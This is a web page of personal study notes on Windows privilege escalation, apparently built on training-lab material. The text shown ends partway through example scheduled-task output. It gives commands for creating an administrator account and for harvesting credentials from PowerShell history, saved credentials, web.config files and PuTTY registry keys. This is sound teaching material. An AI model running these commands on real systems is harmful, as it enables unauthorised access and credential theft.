
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
      
        <link rel="canonical" href="https://grimy86.github.io/Cybersecurity/Maintaining%20Access/WinPrivesc/">
      
      
      
      
      <link rel="icon" href="/assets/Key3.png">
      <meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.6.10">
    
    
      
        <title>Priveledge escalation - Cybersecurity & Code Insights '25</title>
      
    
    
      <link rel="stylesheet" href="../../../assets/stylesheets/main.4af4bdda.min.css">
      
        
        <link rel="stylesheet" href="../../../assets/stylesheets/palette.06af60db.min.css">
      
      


    
    
      
    
    
      
        
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
    <script>__md_scope=new URL("../../..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
    
  </head>
  
  
    
    
      
    
    
    
    
    <body dir="ltr" data-md-color-scheme="default" data-md-color-primary="black" data-md-color-accent="orange">
  
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#priveledge-escalation" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

<header class="md-header" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href="../../.." title="Cybersecurity &amp; Code Insights &#39;25" class="md-header__button md-logo" aria-label="Cybersecurity & Code Insights '25" data-md-component="logo">
      
  <img src="/assets/Key.png" alt="logo">

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            Cybersecurity & Code Insights '25
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              Priveledge escalation
            
          </span>
        </div>
      </div>
    </div>
    
      
        <form class="md-header__option" data-md-component="palette">
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="default" data-md-color-primary="black" data-md-color-accent="orange"  aria-label="Switch to dark mode"  type="radio" name="__palette" id="__palette_0">
    
      <label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 7a5 5 0 0 1 5 5 5 5 0 0 1-5 5 5 5 0 0 1-5-5 5 5 0 0 1 5-5m0 2a3 3 0 0 0-3 3 3 3 0 0 0 3 3 3 3 0 0 0 3-3 3 3 0 0 0-3-3m0-7 2.39 3.42C13.65 5.15 12.84 5 12 5s-1.65.15-2.39.42zM3.34 7l4.16-.35A7.2 7.2 0 0 0 5.94 8.5c-.44.74-.69 1.5-.83 2.29zm.02 10 1.76-3.77a7.131 7.131 0 0 0 2.38 4.14zM20.65 7l-1.77 3.79a7.02 7.02 0 0 0-2.38-4.15zm-.01 10-4.14.36c.59-.51 1.12-1.14 1.54-1.86.42-.73.69-1.5.83-2.29zM12 22l-2.41-3.44c.74.27 1.55.44 2.41.44.82 0 1.63-.17 2.37-.44z"/></svg>
      </label>
    
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="slate" data-md-color-primary="black" data-md-color-accent="orange"  aria-label="Switch to light mode"  type="radio" name="__palette" id="__palette_1">
    
      <label class="md-header__button md-icon" title="Switch to light mode" for="__palette_0" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m17.75 4.09-2.53 1.94.91 3.06-2.63-1.81-2.63 1.81.91-3.06-2.53-1.94L12.44 4l1.06-3 1.06 3zm3.5 6.91-1.64 1.25.59 1.98-1.7-1.17-1.7 1.17.59-1.98L15.75 11l2.06-.05L18.5 9l.69 1.95zm-2.28 4.95c.83-.08 1.72 1.1 1.19 1.85-.32.45-.66.87-1.08 1.27C15.17 23 8.84 23 4.94 19.07c-3.91-3.9-3.91-10.24 0-14.14.4-.4.82-.76 1.27-1.08.75-.53 1.93.36 1.85 1.19-.27 2.86.69 5.83 2.89 8.02a9.96 9.96 0 0 0 8.02 2.89m-1.64 2.02a12.08 12.08 0 0 1-7.8-3.47c-2.17-2.19-3.33-5-3.49-7.82-2.81 3.14-2.7 7.96.31 10.98 3.02 3.01 7.84 3.12 10.98.31"/></svg>
      </label>
    
  
</form>
      
    
    
      <script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
    
    
    
      <label class="md-header__button md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
      </label>
      <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
        <button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
        </button>
      </nav>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list" role="presentation"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
    
    
      <div class="md-header__source">
        <a href="https://github.com/grimy86/grimy86.github.io" title="Go to repository" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 6.7.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M439.55 236.05 244 40.45a28.87 28.87 0 0 0-40.81 0l-40.66 40.63 51.52 51.52c27.06-9.14 52.68 16.77 43.39 43.68l49.66 49.66c34.23-11.8 61.18 31 35.47 56.69-26.49 26.49-70.21-2.87-56-37.34L240.22 199v121.85c25.3 12.54 22.26 41.85 9.08 55a34.34 34.34 0 0 1-48.55 0c-17.57-17.6-11.07-46.91 11.25-56v-123c-20.8-8.51-24.6-30.74-18.64-45L142.57 101 8.45 235.14a28.86 28.86 0 0 0 0 40.81l195.61 195.6a28.86 28.86 0 0 0 40.8 0l194.69-194.69a28.86 28.86 0 0 0 0-40.81"/></svg>
  </div>
  <div class="md-source__repository">
    grimy86.github.io
  </div>
</a>
      </div>
    
  </nav>
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
          
            
<nav class="md-tabs" aria-label="Tabs" data-md-component="tabs">
  <div class="md-grid">
    <ul class="md-tabs__list">
      
        
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../.." class="md-tabs__link">
          
  
  
    
  
  Home

        </a>
      </li>
    
  

      
        
  
  
  
  
    
    
      
  
  
  
  
    
    
      
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../CSharp/Level1/Basics/" class="md-tabs__link">
          
  
  
    
  
  Learn Programming

        </a>
      </li>
    
  

    
  

    
  

      
        
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../Windows_Internals/Introduction/" class="md-tabs__link">
          
  
  
    
  
  Windows Internals

        </a>
      </li>
    
  

      
        
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../Reverse_Engineering/Intro/" class="md-tabs__link">
          
  
  
    
  
  Reverse Engineering

        </a>
      </li>
    
  

      
        
  
  
  
  
    
    
      
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../Networks/Networks/" class="md-tabs__link">
          
  
  
    
  
  Networks & CyberSecurity

        </a>
      </li>
    
  

    
  

      
        
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../About/changelog/" class="md-tabs__link">
          
  
  
    
  
  About

        </a>
      </li>
    
  

      
    </ul>
  </div>
</nav>
          
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    


  


<nav class="md-nav md-nav--primary md-nav--lifted" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../../.." title="Cybersecurity &amp; Code Insights &#39;25" class="md-nav__button md-logo" aria-label="Cybersecurity & Code Insights '25" data-md-component="logo">
      
  <img src="/assets/Key.png" alt="logo">

    </a>
    Cybersecurity & Code Insights '25
  </label>
  
    <div class="md-nav__source">
      <a href="https://github.com/grimy86/grimy86.github.io" title="Go to repository" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 6.7.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M439.55 236.05 244 40.45a28.87 28.87 0 0 0-40.81 0l-40.66 40.63 51.52 51.52c27.06-9.14 52.68 16.77 43.39 43.68l49.66 49.66c34.23-11.8 61.18 31 35.47 56.69-26.49 26.49-70.21-2.87-56-37.34L240.22 199v121.85c25.3 12.54 22.26 41.85 9.08 55a34.34 34.34 0 0 1-48.55 0c-17.57-17.6-11.07-46.91 11.25-56v-123c-20.8-8.51-24.6-30.74-18.64-45L142.57 101 8.45 235.14a28.86 28.86 0 0 0 0 40.81l195.61 195.6a28.86 28.86 0 0 0 40.8 0l194.69-194.69a28.86 28.86 0 0 0 0-40.81"/></svg>
  </div>
  <div class="md-source__repository">
    grimy86.github.io
  </div>
</a>
    </div>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
  
  
  
  
    
    
      
        
          
        
      
        
      
    
    
    
      
      
        
      
    
    
      
        
        
      
    
    <li class="md-nav__item md-nav__item--pruned md-nav__item--nested">
      
        
  
  
  
    <a href="../../.." class="md-nav__link">
      
  
  
  <span class="md-ellipsis">
    Home
    
  </span>
  

      
        <span class="md-nav__icon md-icon"></span>
      
    </a>
  

      
    </li>
  

    
      
      
  
  
  
  
    
    
      
        
      
        
      
        
      
        
      
    
    
    
      
      
        
      
    
    
      
        
        
      
    
    <li class="md-nav__item md-nav__item--pruned md-nav__item--nested">
      
        
  
  
  
    
  
  
  
    
  
  
  
    <a href="../../../CSharp/Level1/Basics/" class="md-nav__link">
      
  
  
  <span class="md-ellipsis">
    Learn Programming
    
  </span>
  

      
        <span class="md-nav__icon md-icon"></span>
      
    </a>
  

  

  

      
    </li>
  

    
      
      
  
  
  
  
    
    
      
        
      
        
      
        
      
        
      
        
      
        
      
        
      
        
      
        
      
        
      
    
    
    
      
      
        
      
    
    
      
        
        
      
    
    <li class="md-nav__item md-nav__item--pruned md-nav__item--nested">
      
        
  
  
  
    <a href="../../../Windows_Internals/Introduction/" class="md-nav__link">
      
  
  
  <span class="md-ellipsis">
    Windows Internals
    
  </span>
  

      
        <span class="md-nav__icon md-icon"></span>
      
    </a>
  

      
    </li>
  

    
      
      
  
  
  
  
    
    
      
        
      
        
      
        
      
        
      
        
      
    
    
    
      
      
        
      
    
    
      
        
        
      
    
    <li class="md-nav__item md-nav__item--pruned md-nav__item--nested">
      
        
  
  
  
    <a href="../../../Reverse_Engineering/Intro/" class="md-nav__link">
      
  
  
  <span class="md-ellipsis">
    Reverse Engineering
    
  </span>
  

      
        <span class="md-nav__icon md-icon"></span>
      
    </a>
  

      
    </li>
  

    
      
      
  
  
  
  
    
    
      
        
      
        
      
    
    
    
      
      
        
      
    
    
      
        
        
      
    
    <li class="md-nav__item md-nav__item--pruned md-nav__item--nested">
      
        
  
  
  
    
  
  
  
    <a href="../../../Networks/Networks/" class="md-nav__link">
      
  
  
  <span class="md-ellipsis">
    Networks & CyberSecurity
    
  </span>
  

      
        <span class="md-nav__icon md-icon"></span>
      
    </a>
  

  

      
    </li>
  

    
      
      
  
  
  
  
    
    
      
        
      
        
      
        
      
        
      
        
      
        
      
    
    
    
      
      
        
      
    
    
      
        
        
      
    
    <li class="md-nav__item md-nav__item--pruned md-nav__item--nested">
      
        
  
  
  
    <a href="../../../About/changelog/" class="md-nav__link">
      
  
  
  <span class="md-ellipsis">
    About
    
  </span>
  

      
        <span class="md-nav__icon md-icon"></span>
      
    </a>
  

      
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              
              <div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#account-types" class="md-nav__link">
    <span class="md-ellipsis">
      Account types
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#credential-harvesting-from-usual-spots" class="md-nav__link">
    <span class="md-ellipsis">
      Credential harvesting from usual spots
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Credential harvesting from usual spots">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#unattended" class="md-nav__link">
    <span class="md-ellipsis">
      Unattended
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#powershell-history" class="md-nav__link">
    <span class="md-ellipsis">
      Powershell history
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#save-windows-credentials" class="md-nav__link">
    <span class="md-ellipsis">
      Save Windows Credentials
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#iis-configuration-internet-information-services" class="md-nav__link">
    <span class="md-ellipsis">
      IIS Configuration (Internet Information Services)
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#retrieve-credentials-from-software-putty" class="md-nav__link">
    <span class="md-ellipsis">
      Retrieve Credentials from Software: PuTTY
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#other-quick-wins" class="md-nav__link">
    <span class="md-ellipsis">
      Other quick wins
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Other quick wins">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#scheduled-tasks-windowss-cronjobs" class="md-nav__link">
    <span class="md-ellipsis">
      Scheduled tasks (Windows's cronjobs)
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#alwaysinstallelevated-msi-files-run-with-elevated-privileges" class="md-nav__link">
    <span class="md-ellipsis">
      AlwaysInstallElevated (.msi files run with elevated privileges)
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#abusing-service-misconfigurations" class="md-nav__link">
    <span class="md-ellipsis">
      Abusing Service Misconfigurations
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Abusing Service Misconfigurations">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#what-are-windows-services" class="md-nav__link">
    <span class="md-ellipsis">
      What are Windows Services?
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#insecure-permissions-on-service-executable" class="md-nav__link">
    <span class="md-ellipsis">
      Insecure Permissions on Service Executable
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#unquoted-service-paths" class="md-nav__link">
    <span class="md-ellipsis">
      Unquoted Service Paths
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#insecure-service-permissions" class="md-nav__link">
    <span class="md-ellipsis">
      Insecure Service Permissions
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#abusing-dangerous-privileges" class="md-nav__link">
    <span class="md-ellipsis">
      Abusing dangerous privileges
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Abusing dangerous privileges">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#sebackup-serestore" class="md-nav__link">
    <span class="md-ellipsis">
      SeBackup / SeRestore
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#setakeownership" class="md-nav__link">
    <span class="md-ellipsis">
      SeTakeOwnership
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#others-summary" class="md-nav__link">
    <span class="md-ellipsis">
      Others / Summary
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#abusing-vulnerable-software" class="md-nav__link">
    <span class="md-ellipsis">
      Abusing vulnerable software
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#tools-of-the-trade" class="md-nav__link">
    <span class="md-ellipsis">
      Tools of the trade
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          
            <div class="md-content" data-md-component="content">
              <article class="md-content__inner md-typeset">
                
                  


  
  


<h1 id="priveledge-escalation">Priveledge escalation<a class="headerlink" href="#priveledge-escalation" title="Permanent link">&para;</a></h1>
<p>Ok, we have a shell. Now what? Most shells tend to be unstable and non-interactive. Time to exploit of a vulnerability, design flaw, or configuration oversight in an operating system or application to <code>gain unauthorized access</code> to resources that are usually restricted from the users.</p>
<p>On Windows the options are often more limited. It's sometimes possible to find passwords for <code>running services in the registry</code>. <code>VNC servers</code>, for example, frequently leave passwords in the registry stored in plaintext. Some versions of the <code>FileZilla FTP server</code> also leave credentials in an XML file at <code>C:\Program Files\FileZilla Server\FileZilla Server.xml</code>
 or <code>C:\xampp\FileZilla Server\FileZilla Server.xml</code>. These can be <code>MD5 hashes</code> or in plaintext, depending on the version.</p>
<p>Ideally on Windows you would obtain a shell running as the <code>SYSTEM user</code>, or an <code>administrator account</code> running with high privileges. In such a situation it's possible to simply add your own account (in the administrators group) to the machine, then log in over <code>RDP</code>, <code>telnet</code>, <code>winexe</code>, <code>psexec</code>, <code>WinRM</code> or any number of other methods, dependent on the services running on the box.</p>
<p>The syntax for this is as follows:
- <code>net user &lt;username&gt; &lt;password&gt; /add</code>
- <code>net localgroup administrators &lt;username&gt; /add</code></p>
<p>Simply put, privilege escalation consists of using given access to a host with "user A" and leveraging it to gain access to "user B" by abusing a weakness in the target system.</p>
<p>Gaining access to different accounts can be as simple as finding credentials in text files or spreadsheets left unsecured by some careless user, but that won't always be the case. Depending on the situation, we might need to abuse some of the following weaknesses:
- Misconfigurations on Windows services or scheduled tasks
- Excessive privileges assigned to our account
- Vulnerable software
- Missing Windows security patches</p>
<h2 id="account-types">Account types<a class="headerlink" href="#account-types" title="Permanent link">&para;</a></h2>
<table>
<thead>
<tr>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>User accounts</strong></td>
<td>-</td>
</tr>
<tr>
<td>Administrators</td>
<td>These users have the most privileges. They can change any system configuration parameter and access any file in the system. Any user with administrative privileges will be part of the <code>Administrators group</code>.</td>
</tr>
<tr>
<td>Standard Users</td>
<td>These users can access the computer but only perform limited tasks. Typically these users can not make permanent or essential changes to the system and are limited to their files. Part of the <code>Users group</code>.</td>
</tr>
<tr>
<td><strong>OS / built-in accounts</strong></td>
<td>-</td>
</tr>
<tr>
<td>SYSTEM / LocalSystem</td>
<td>Used by the operating system to perform internal tasks. It has full access to all files and resources available on the host with even higher privileges than administrators.</td>
</tr>
<tr>
<td>Local Service</td>
<td>Default account used to run Windows services with "minimum" privileges. It will use anonymous connections over the network.</td>
</tr>
<tr>
<td>Network Service</td>
<td>Default account used to run Windows services with "minimum" privileges. It will use the computer credentials to authenticate through the network.</td>
</tr>
</tbody>
</table>
<p>These accounts are created and managed by Windows, and you won't be able to use them as other regular accounts. Still, in some situations, you may gain their privileges due to exploiting specific services.</p>
<h2 id="credential-harvesting-from-usual-spots">Credential harvesting from usual spots<a class="headerlink" href="#credential-harvesting-from-usual-spots" title="Permanent link">&para;</a></h2>
<p>The easiest way to gain access to another user is to gather credentials from a compromised machine. Such credentials could exist for many reasons, including a careless user leaving them around in plaintext files; or even stored by some software like browsers or email clients.</p>
<h3 id="unattended">Unattended<a class="headerlink" href="#unattended" title="Permanent link">&para;</a></h3>
<p>When installing Windows on a large number of hosts, administrators may use <code>Windows Deployment Services</code>, which allows for a single operating system image to be deployed to several hosts through the network. These kinds of installations are <code>referred to as unattended installations</code> as they don't require user interaction. Such installations require the use of an administrator account to perform the initial setup, which might end up being stored in the machine in the following locations:
- <code>C:\Unattend.xml</code>
- <code>C:\Windows\Panther\Unattend.xml</code>
- <code>C:\Windows\Panther\Unattend\Unattend.xml</code>
- <code>C:\Windows\system32\sysprep.inf</code>
- <code>C:\Windows\system32\sysprep\sysprep.xml</code></p>
<div class="language-text highlight"><pre><span></span><code>As part of these files, you might encounter credentials:
```xml
&lt;Credentials&gt;
    &lt;Username&gt;Administrator&lt;/Username&gt;
    &lt;Domain&gt;thm.local&lt;/Domain&gt;
    &lt;Password&gt;MyPassword123&lt;/Password&gt;
&lt;/Credentials&gt;
```
</code></pre></div>
<h3 id="powershell-history">Powershell history<a class="headerlink" href="#powershell-history" title="Permanent link">&para;</a></h3>
<p>If a user runs a command that includes a password directly as part of the Powershell command line, it can later be retrieved by using the following command from a <code>cmd.exe</code> prompt:</p>
<p><code>type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt</code></p>
<p>Note: The command above will only work from cmd.exe, as Powershell won't recognize <code>%userprofile%</code> as an environment variable. To read the file from Powershell, you'd have to replace <code>%userprofile%</code> with <code>$Env:userprofile</code>.</p>
<h3 id="save-windows-credentials">Save Windows Credentials<a class="headerlink" href="#save-windows-credentials" title="Permanent link">&para;</a></h3>
<p>Windows allows us to use other users' credentials. This function also gives the option to save these credentials on the system. The command below will list saved credentials: <code>cmdkey /list</code>.</p>
<p>While you can't see the actual passwords, if you notice any credentials worth trying, you can use them with the <code>runas</code> command and the <code>/savecred</code> option: <code>runas /savecred /user:admin cmd.exe</code>.</p>
<h3 id="iis-configuration-internet-information-services">IIS Configuration (Internet Information Services)<a class="headerlink" href="#iis-configuration-internet-information-services" title="Permanent link">&para;</a></h3>
<p>This is the default web server on Windows installations.
The configuration of websites on IIS is stored in a file called web.config and can store passwords for databases or configured authentication mechanisms.
Depending on the installed version of IIS, we can find web.config in one of the following locations:
- <code>C:\inetpub\wwwroot\web.config</code>
- <code>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config</code></p>
<p>Here is a quick way to find database connection strings on the file: <code>type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString</code>.</p>
<p>Output may look like:
<div class="language-xml highlight"><pre><span></span><code><span id="__span-1-1"><a id="__codelineno-1-1" name="__codelineno-1-1" href="#__codelineno-1-1"></a><span class="nt">&lt;connectionStrings&gt;</span>
</span><span id="__span-1-2"><a id="__codelineno-1-2" name="__codelineno-1-2" href="#__codelineno-1-2"></a><span class="w">    </span><span class="nt">&lt;add</span><span class="w"> </span><span class="na">connectionString=</span><span class="s">&quot;Server=thm-db.local;Database=thm-sekure;User ID=db_admin;Password=098n0x35skjD3&quot;</span><span class="w"> </span><span class="na">name=</span><span class="s">&quot;THM-DB&quot;</span><span class="w"> </span><span class="nt">/&gt;</span>
</span><span id="__span-1-3"><a id="__codelineno-1-3" name="__codelineno-1-3" href="#__codelineno-1-3"></a><span class="nt">&lt;/connectionStrings&gt;</span>
</span></code></pre></div></p>
<h3 id="retrieve-credentials-from-software-putty">Retrieve Credentials from Software: PuTTY<a class="headerlink" href="#retrieve-credentials-from-software-putty" title="Permanent link">&para;</a></h3>
<p>PuTTY is an SSH client commonly found on Windows systems.
Instead of having to specify a connection's parameters every single time, users can store sessions where the IP, user and other configurations can be stored for later use.
While PuTTY won't allow users to store their SSH password, it will store proxy configurations that include cleartext authentication credentials.</p>
<p>To retrieve the stored proxy credentials, you can search under the following registry key for ProxyPassword with the following command: <code>reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s</code>.</p>
<h2 id="other-quick-wins">Other quick wins<a class="headerlink" href="#other-quick-wins" title="Permanent link">&para;</a></h2>
<h3 id="scheduled-tasks-windowss-cronjobs">Scheduled tasks (Windows's cronjobs)<a class="headerlink" href="#scheduled-tasks-windowss-cronjobs" title="Permanent link">&para;</a></h3>
<p>Look for a scheduled task that either lost its binary or a binary you can modify.
Scheduled tasks can be listed from the command line using the <code>schtasks</code> command without any options.</p>
<p>To retrieve detailed information about any of the services, you can use a command like: <code>schtasks /query /tn vulntask /fo list /v</code>. You will get lots of information about the task, but what matters for us is the <code>Task to Run</code> parameter which indicates what gets executed by the scheduled task, and the <code>Run As User</code> parameter, which shows the user that will be used to execute the task.</p>
<p>Example output:</p>
<div class="language-text highlight"><pre><span></span><code><span id="__span-2-1"><a id="__codelineno-2-1" name="__codelineno-2-1" href="#__codelineno-2-1"></a>Folder: \
</span><span id="__span-2-2"><a id="__codelineno-2-2" name="__codelineno-2-2" href="#__codelineno-2-2"></a>HostName:                             WPRIVESC1
</span><span id="__span-2-3"><a id="__codelineno-2-3" name="__codelineno-2-3" href="#__codelineno-2-3"></a>TaskName:                             \vulntask
</span><span id="__span-2-4"><a id="__codelineno-2-4" name="__codelineno-2-4" href="#__codelineno-2-4"></a>Next Run Time:                        N/A
</span><span id="__span-2-5"><a id="__codelineno-2-5" name="__codelineno-2-5" href="#__codelineno-2-5"></a>Status:                               Ready
</span><span id="__span-2-6"><a id="__codelineno-2-6" name="__codelineno-2-6" href="#__codelineno-2-6"></a>Logon Mode:                           Interactive/Background
</span><span id="__span-2-7"><a id="__codelineno-2-7" name="__codelineno-2-7" href="#__codelineno-2-7"></a>Last Run Time:                        1/21/2025 9:48:47 PM
</span><span id="__span-2-8"><a id="__codelineno-2-8" name="__codelineno-2-8" href="#__codelineno-2-8"></a>Last Result:                          0
</span><span id="__span-2-9"><a id="__codelineno-2-9" name="__codelineno-2-9" href="#__codelineno-2-9"></a>Author:                               WPRIVESC1\Administrator
</span><span id="__span-2-10"><a id="__codelineno-2-10" name="__codelineno-2-10" href="#__codelineno-2-10"></a>Task To Run:                          C:\tasks\schtask.bat
</span><span id="__span-2-11"><a id="__codelineno-2-11" name="__codelineno-2-11" href="#__codelineno-2-11"></a>Start In:                             N/A
</span><span id="__span-2-12"><a id="__codelineno-2-12" name="__codelineno-2-12" href="#__codelineno-2-12"></a>Comment:                              N/A
</span><span id="__span-2-13"><a id="__codelineno-2-13" name="__codelineno-2-13" href="#__codelineno-2-13"></a>Scheduled Task State:                 Enabled
</span><span id="__span-2-14"><a id="__codelineno-2-14" name="__codelineno-2-14" href="#__codelineno-2-14"></a>Idle Time:                            Disabled
